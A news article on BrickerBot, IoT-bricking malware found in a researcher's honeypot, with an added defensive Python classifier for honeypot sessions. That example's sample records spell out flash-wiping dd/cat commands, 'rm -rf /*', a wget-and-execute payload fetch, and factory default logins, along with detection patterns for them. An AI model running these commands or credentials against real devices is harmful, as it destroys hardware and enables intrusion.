Malware that bricks insecure IoT devices might be anti-botnet vigilante tool
A new variety of malicious software is capable of attacking and effectively destroying insecure connected Internet of Things devices, using the same security flaws exploited by the notorious Mirai botnet, a researcher says.
It’s not clear how many devices might have been damaged by the BrickerBot malware, Pascal Geenens, the researcher who discovered it, told CyberScoop. But the malware, which attacks the devices by trying to corrupt their firmware and flash memory, is at the very least a powerful proof-of-concept likely to inspire copycats.
Geenens, a cybersecurity evangelist for Radware, last month found two varieties of BrickerBot attacking his honeypot — a network of computers left on the internet as bait for hackers — but since the honeypot doesn’t contain any actual IoT devices, he couldn’t be sure exactly what the impact of the attack might be in real life.
Geenens speculated the author might be some kind of digital vigilante — aiming to alert the world to the ease with which IoT devices could be compromised, while simultaneously punishing both the users who installed them so carelessly and the manufacturers, who designed them without any security or any way to provide some.
“It could be a white-hat-turned-gray-hat,” he said.
Depending on the exact type of device and the way it was configured, he said, “The damage might be total, to stop the device from working at all, or it might be almost unnoticeable … It might be more or less permanent.”
Some kinds of damage could be cured with a reboot; other devices would be “bricked” — effectively destroyed or rendered useless.
“We are not aware of any user reports” about real damage from BrickerBot, he said, adding that webcams were the most likely kinds of devices to fall victim.
The dangers posed by the weaponization of insecure IoT connected devices were underlined last year by Mirai. The malware recruited such devices into huge botnets, and used their internet connections to deluge targeted sites with fake traffic, knocking them offline in a distributed denial-of-service, or DDoS, attack.
Geenens added that BrickerBot could also be the work of a frustrated Mirai bot herder. “It could be a black-hat hacker, whose botnet lost out, looking for revenge [on former competitors] by … eradicating the problem.”
BrickerBot breaks into devices the same way Mirai does, by scanning the internet for reachable devices and then trying a series of manufacturers' default passwords. But once successfully logged in, it does not install malware to propagate itself, as Mirai does.
Instead, it sends the compromised device a series of commands designed to cripple it, principally by overwriting or corrupting embedded flash memory and other firmware components.
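A honeypot operator sees that difference in the session transcripts: a Mirai-style session fetches and runs a payload, a BrickerBot-style session writes over storage. The Python below is an added example, not Radware's or the malware's own code, and it works on constructed session records rather than real honeypot data. It assumes the service is Telnet, uses a short sample of the factory logins from Mirai's published source as its default-credential list, and treats writes to raw flash or block devices and a wipe of the root filesystem as the destructive indicators (assumed indicators; the article does not list BrickerBot's commands). It also computes the per-source attempt rate that separates a fast campaign like the first one described below from a slow one that probes every couple of hours.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime

# Assumption: a short sample of the factory default logins that Mirai's
# published source tries; a real watchlist would be much longer.
DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"),
    ("admin", "admin"), ("root", "root"), ("root", "12345"),
}

# Assumed indicators (not the article's list of BrickerBot commands):
# anything that writes over raw flash / block devices or wipes the root fs.
DESTRUCTIVE_RE = re.compile(
    r"(?:>|of=)\s*/dev/(?:mtd(?:block)?\d*|mmcblk\d*|sd[a-z]\d*)\b"
    r"|\brm\s+-rf\s+/\*?(?:\s|$)"
    r"|\bmtd_write\b"
)
# Mirai-style behaviour: fetch a payload and make it executable / run it.
PROPAGATION_RE = re.compile(r"\b(?:wget|tftp|curl)\b|\bchmod\s+(?:\+x|7[0-7]{2})\b")


@dataclass
class Session:
    src: str                # source IP seen by the honeypot
    when: str               # ISO-8601 timestamp of the login attempt
    user: str
    password: str
    commands: list = field(default_factory=list)  # empty if login failed


def uses_default_cred(user, password):
    return (user, password) in DEFAULT_CREDS


def classify(session):
    """'destructive' (BrickerBot-like), 'propagation' (Mirai-like) or
    'credential-probe' (a login attempt with no further activity)."""
    if any(DESTRUCTIVE_RE.search(c) for c in session.commands):
        return "destructive"
    if any(PROPAGATION_RE.search(c) for c in session.commands):
        return "propagation"
    return "credential-probe"


def attempts_per_hour(sessions):
    """Attempts per hour for each source. A span shorter than an hour is
    treated as one hour, so a lone attempt counts as 1/h."""
    by_src = defaultdict(list)
    for s in sessions:
        by_src[s.src].append(datetime.fromisoformat(s.when))
    rates = {}
    for src, times in by_src.items():
        span_h = (max(times) - min(times)).total_seconds() / 3600
        rates[src] = len(times) / max(span_h, 1.0)
    return rates


def summarize(sessions):
    """Per-source counts of default-credential logins and session types,
    plus the attempt rate, for a quick triage report."""
    rates = attempts_per_hour(sessions)
    out = {}
    for s in sessions:
        rec = out.setdefault(s.src, {"default_creds": 0, "destructive": 0,
                                     "propagation": 0, "credential-probe": 0})
        rec["default_creds"] += uses_default_cred(s.user, s.password)
        rec[classify(s)] += 1
    for src, rec in out.items():
        rec["per_hour"] = round(rates[src], 2)
    return out


# Constructed sample sessions, not real honeypot captures.
SESSIONS = [
    Session("198.51.100.4", "2017-03-20T10:00:00", "root", "xc3511",
            ["busybox dd if=/dev/urandom of=/dev/mtdblock0", "rm -rf /* 2>/dev/null"]),
    Session("198.51.100.4", "2017-03-20T10:00:40", "root", "vizxv",
            ["busybox cat /dev/urandom >/dev/mtd0 &"]),
    Session("198.51.100.4", "2017-03-20T10:01:30", "admin", "admin", []),
    Session("203.0.113.9", "2017-03-20T11:00:00", "root", "12345",
            ["wget http://192.0.2.5/bins/arm7 -O /tmp/.x", "chmod 777 /tmp/.x", "/tmp/.x"]),
    Session("203.0.113.9", "2017-03-20T15:00:00", "root", "s3cr3t-custom", []),
]

if __name__ == "__main__":
    for src, rec in summarize(SESSIONS).items():
        print(src, rec)
```

With the sample above, the first source is classified as a fast destructive campaign (three attempts inside two minutes, two of them writing to flash) and the second as a slow, Mirai-style propagation attempt at about one login every few hours. The indicator lists are the part to tune for a real deployment: add the device vendor's own flash and storage paths and the defaults for the hardware you actually operate.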
The first BrickerBot campaign last month came from a dozen or so internet routers, all of which were running outdated firmware. "My presumption is that those devices had been compromised," said Geenens.
After four days that campaign stopped, having made 1,800 separate attempts to destroy the simulated devices in Geenens' honeypot.
But the second BrickerBot, which had started within an hour of the first, continues to this day, he said. It is much slower, attacking only every two hours, and its source is hidden because the attacks are launched through the anonymizing Tor network, so the honeypot sees only Tor exit nodes rather than the true origin.
Now that Geenens’ report on BrickerBot is getting such a lot of attention, he suggested that the author might try to come forward in some fashion, perhaps even anonymously, to enjoy some of the acclaim.
"A lot of people [have expressed admiration on social media for] what he's done, so he might come out … Or he might get scared [at all the attention he's generating] and stop."
Either way, said Geenens, “There will be copycats.”